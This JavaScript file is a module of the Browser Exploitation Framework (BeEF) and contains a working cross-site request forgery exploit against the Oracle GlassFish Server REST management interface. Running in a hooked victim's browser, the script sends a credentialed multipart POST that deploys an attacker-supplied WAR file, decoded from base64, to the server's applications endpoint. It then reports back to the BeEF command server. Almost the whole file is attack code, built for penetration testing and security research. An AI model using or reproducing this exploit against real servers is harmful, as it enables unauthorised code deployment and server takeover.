121 lines
3.3 KiB
JavaScript
121 lines
3.3 KiB
JavaScript
//
|
|
// Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
|
|
// This exploit is based on the PoC by Roberto Suggi Liverani - Security-Assessment.com
|
|
// For more info, refer to: http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html
|
|
|
|
|
|
beef.execute(function() {
|
|
var restHost = '<%= @restHost %>';
|
|
var warName = '<%= @warName %>';
|
|
var warBase = '<%= @warBase %>';
|
|
|
|
var logUrl = restHost + '/management/domain/applications/application';
|
|
|
|
|
|
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
|
|
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
|
|
function byteValue(x) {
|
|
return x.charCodeAt(0) & 0xff;
|
|
}
|
|
var ords = Array.prototype.map.call(datastr, byteValue);
|
|
var ui8a = new Uint8Array(ords);
|
|
this.send(ui8a.buffer);
|
|
}
|
|
}
|
|
|
|
function fileUpload(fileData, fileName) {
|
|
boundary = "HELLOWORLD270883142628617",
|
|
uri = logUrl,
|
|
xhr = new XMLHttpRequest();
|
|
|
|
var additionalFields = {
|
|
asyncreplication: "true",
|
|
availabilityenabled: "false",
|
|
contextroot: "",
|
|
createtables: "true",
|
|
dbvendorname: "",
|
|
deploymentplan: "",
|
|
description: "",
|
|
dropandcreatetables: "true",
|
|
enabled: "true",
|
|
force: "false",
|
|
generatermistubs: "false",
|
|
isredeploy: "false",
|
|
keepfailedstubs: "false",
|
|
keepreposdir: "false",
|
|
keepstate: "true",
|
|
lbenabled: "true",
|
|
libraries: "",
|
|
logReportedErrors: "true",
|
|
name: "",
|
|
precompilejsp: "false",
|
|
properties: "",
|
|
property: "",
|
|
retrieve: "",
|
|
target: "",
|
|
type: "",
|
|
uniquetablenames: "true",
|
|
verify: "false",
|
|
virtualservers: "",
|
|
__remove_empty_entries__: "true"
|
|
}
|
|
|
|
|
|
var fileFieldName = "id";
|
|
xhr.open("POST", uri, true);
|
|
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
|
|
xhr.withCredentials = "true";
|
|
xhr.onreadystatechange = function() {
|
|
if (xhr.readyState == 4) {
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Attempt to deploy \"' + warName + '\" completed.');
|
|
}
|
|
}
|
|
|
|
var body = "";
|
|
|
|
for (var i in additionalFields) {
|
|
if (additionalFields.hasOwnProperty(i)) {
|
|
body += addField(i, additionalFields[i], boundary);
|
|
}
|
|
}
|
|
|
|
body += addFileField(fileFieldName, fileData, fileName, boundary);
|
|
body += "--" + boundary + "--";
|
|
xhr.setRequestHeader('Content-length', body.length);
|
|
xhr.sendAsBinary(body);
|
|
return true;
|
|
}
|
|
|
|
function addField(name, value, boundary) {
|
|
var c = "--" + boundary + "\r\n"
|
|
c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
|
|
c += value + "\r\n";
|
|
return c;
|
|
}
|
|
|
|
function addFileField(name, value, filename, boundary) {
|
|
var c = "--" + boundary + "\r\n"
|
|
c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';
|
|
c += "Content-Type: application/octet-stream\r\n\r\n";
|
|
|
|
c += atob(value);
|
|
|
|
c += "\r\n";
|
|
return c;
|
|
}
|
|
|
|
|
|
function start() {
|
|
fileUpload(warBase,warName);
|
|
}
|
|
|
|
start();
|
|
|
|
});
|
|
|